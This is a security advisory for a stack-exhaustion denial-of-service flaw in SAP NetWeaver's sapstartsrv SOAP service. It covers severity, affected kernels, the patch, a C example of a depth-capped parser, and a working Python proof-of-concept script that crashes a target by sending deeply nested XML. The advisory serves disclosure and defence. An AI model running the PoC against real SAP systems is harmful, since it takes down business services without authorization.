ERPSCAN-16-030

SAP NetWeaver - buffer overflow vulnerability

Published: 2016-09-03
Source: erpscan.io
EPSS: 0.007 (Low), percentile 80.7%

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver 7.0-7.5
Vendor URL: SAP
Bugs: buffer overflow
Reported: 09.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
Reference: SAP Security Note 2295238
Author: Dmitry Yudin (ERPScan)

VULNERABILITY INFORMATION

Class: Denial of Service
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2016-10311

CVSS Information

CVSS Base Score v3: 6.5 / 10
CVSS Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

AV: Attack Vector (related exploit range): Network (N)
AC: Attack Complexity (required attack complexity): Low (L)
PR: Privileges Required (level of privileges needed to exploit): None (N)
UI: User Interaction (required user participation): None (N)
S: Scope (change in scope due to impact caused to components beyond the vulnerable component): Unchanged (U)
C: Impact to Confidentiality: None (N)
I: Impact to Integrity: Low (L)
A: Impact to Availability: Low (L)

Description

This vulnerability allows an unauthenticated attacker to send a specially crafted SOAP request to the port of the SAPSTARTSRV process (the SAP start service, whose web service endpoint accepts SAPControl requests) and cause a stack overflow on the SAP server. The overflow is stack exhaustion rather than an out-of-bounds write: the request nests XML elements 100,000 levels deep inside the SOAP header, and the SOAP parser in sapstartsrv descends recursively, spending one stack frame per level until the thread's stack is used up and the process faults. The WinDbg trace in the proof of concept below shows the fault inside the parser (sapstartsrv!soap_getutf8 calling soap_get) with rsp at 0x2b93ff0, sixteen bytes below a page boundary, which is consistent with the thread running into its stack guard page.
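The mechanism above, as an added example that is not code from ERPScan's advisory or from SAP: a toy recursive-descent element parser that fails the same way, because every nested element costs one stack frame, shown next to a hardened variant that caps nesting depth and rejects the document instead of recursing. The element grammar is reduced to "<name>children</name>" with no attributes or text, which is all the PoC payload relies on; MAX_DEPTH, parse_element, nesting_depth and depth_of_nested are names chosen here and the limit value is an assumption.

```c
/* Added example, not code from ERPScan's advisory or from SAP: a toy
 * recursive-descent element parser. With max_depth <= 0 it behaves like
 * the vulnerable parser (the only limit is the thread stack); with a
 * positive max_depth it refuses deep documents before recursing. */
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH  64     /* assumed limit for the hardened parser */
#define ERR_SYNTAX (-1)
#define ERR_DEPTH  (-2)

/* Parse one element at *p, advancing *p past its closing tag.
 * Returns the deepest nesting level seen (1 for a leaf) or a negative
 * error. max_depth <= 0 disables the check: that is the vulnerable
 * configuration, where a 100000-deep payload exhausts the stack. */
static int parse_element(const char **p, int depth, int max_depth)
{
    const char *s = *p;
    if (s[0] != '<' || s[1] == '/')
        return ERR_SYNTAX;
    const char *name = s + 1;
    const char *gt = strchr(name, '>');
    if (gt == NULL || gt == name)
        return ERR_SYNTAX;
    size_t nlen = (size_t)(gt - name);

    /* The fix: bail out before recursing once nesting exceeds the cap. */
    if (max_depth > 0 && depth + 1 > max_depth)
        return ERR_DEPTH;

    int deepest = depth + 1;
    s = gt + 1;
    /* Child elements: this recursive call is what consumes stack. */
    while (s[0] == '<' && s[1] != '/') {
        int r = parse_element(&s, depth + 1, max_depth);
        if (r < 0)
            return r;
        if (r > deepest)
            deepest = r;
    }
    /* Closing tag must match the opening name. */
    if (strncmp(s, "</", 2) != 0 || strncmp(s + 2, name, nlen) != 0 ||
        s[2 + nlen] != '>')
        return ERR_SYNTAX;
    *p = s + 3 + nlen;
    return deepest;
}

/* Parse a whole document; returns its nesting depth or a negative error. */
int nesting_depth(const char *doc, int max_depth)
{
    const char *p = doc;
    int r = parse_element(&p, 0, max_depth);
    if (r < 0)
        return r;
    return *p == '\0' ? r : ERR_SYNTAX;
}

/* Build the PoC's shape, "<a>" * n followed by "</a>" * n (constructed
 * input), into a static buffer and parse it with the given limit. */
int depth_of_nested(int n, int max_depth)
{
    static char buf[1 << 16];
    if (n < 1 || (size_t)n * 7 + 1 > sizeof buf)
        return ERR_SYNTAX;
    char *w = buf;
    for (int i = 0; i < n; i++) { memcpy(w, "<a>", 3);  w += 3; }
    for (int i = 0; i < n; i++) { memcpy(w, "</a>", 4); w += 4; }
    *w = '\0';
    return nesting_depth(buf, max_depth);
}

int main(void)
{
    printf("well-formed, 2 levels:  %d\n", nesting_depth("<a><b></b></a>", MAX_DEPTH));
    printf("1000 levels, no limit:  %d\n", depth_of_nested(1000, 0));
    printf("1000 levels, limit %d: %d\n", MAX_DEPTH, depth_of_nested(1000, MAX_DEPTH));
    /* depth_of_nested(100000, 0) would need 100000 stack frames: that is
     * the crash the PoC triggers, so it is deliberately not run here. */
    return 0;
}
```

The unbounded variant accepts a 1000-level document because that still fits in the thread stack; the depth it would tolerate is set by the stack size and frame size, not by anything the parser checks, which is exactly the condition the 100,000-level payload exploits. The hardened variant fails closed with ERR_DEPTH at the 65th level regardless of how much input follows, so the cost of a malicious request is bounded by the cap rather than by the stack.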

Business risk

An attacker who can reach the sapstartsrv port can crash the SAP start service at will, with no credentials and no user interaction. Because this overflow is stack exhaustion through recursion, the practical outcome is denial of service: the sapstartsrv process terminates, and until it is restarted the instance cannot be started, stopped or monitored through sapcontrol or the SAP MMC, which interrupts the business processes that depend on those operations and costs system downtime and reputation. Buffer overflows in general can let an attacker inject code into a process's working memory that then runs with the service's privileges, leading to complete control of the application, command execution, theft of critical technical and business-related information from the SAP system, or privilege escalation; that requires a memory-corruption primitive beyond stack exhaustion, and this advisory demonstrates only the crash, which is why it is classified as denial of service.

VULNERABLE PACKAGES

SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2295238, which delivers patched kernels for the releases listed above. The advisory gives no vendor workaround. As a general hardening measure rather than a vendor-supplied one, restricting network access to the sapstartsrv web service ports (5<NN>13 for HTTP and 5<NN>14 for HTTPS by default, where NN is the instance number) to the hosts that actually manage the instance limits who can reach the vulnerable endpoint until the kernel is patched.

TECHNICAL DESCRIPTION

Proof of Concept



import socket
import sys

# Usage: python poc.py <SAP_IP> <SAP_PORT>
# SAP_PORT is the sapstartsrv web service port of the target instance.
if len(sys.argv) != 3:
    sys.exit("usage: poc.py SAP_IP SAP_PORT")
SAP_IP = sys.argv[1]
SAP_PORT = int(sys.argv[2])

# 100000 nested <a> elements inside the SOAP header: the parser recurses once per
# level and exhausts the thread stack long before it reaches the closing tags.
# The rest of the envelope is reproduced as published; it is not well-formed
# (xlmns, unbalanced <e>), but the parser never gets that far.
PoC = """<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session xlmns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
>""" + "<a>" * 100000 + "</a>" * 100000 + """ </sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:WW xmlns:ns1="urn:SAPControl">
<b></b>
<e><e>
</ns1:WW>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# A few attempts, one connection each; the service normally dies on the first.
for i in range(1, 5):
    sock = socket.socket()
    sock.connect((SAP_IP, SAP_PORT))
    sock.sendall(PoC.encode("utf-8"))   # send bytes, and all of them
    sock.close()

WinDbg exception (register state at the faulting call, sapstartsrv x64):

sapstartsrv!soap_getutf8+0xa:
000000014009cd2a e891f9ffff      call    sapstartsrv!soap_get (000000014009c6c0)
rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0
rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0
rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0
 r8=0000000134936c69  r9=0000000000000000 r10=0000000000000000
r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f
r14=00000001409f8ba0 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
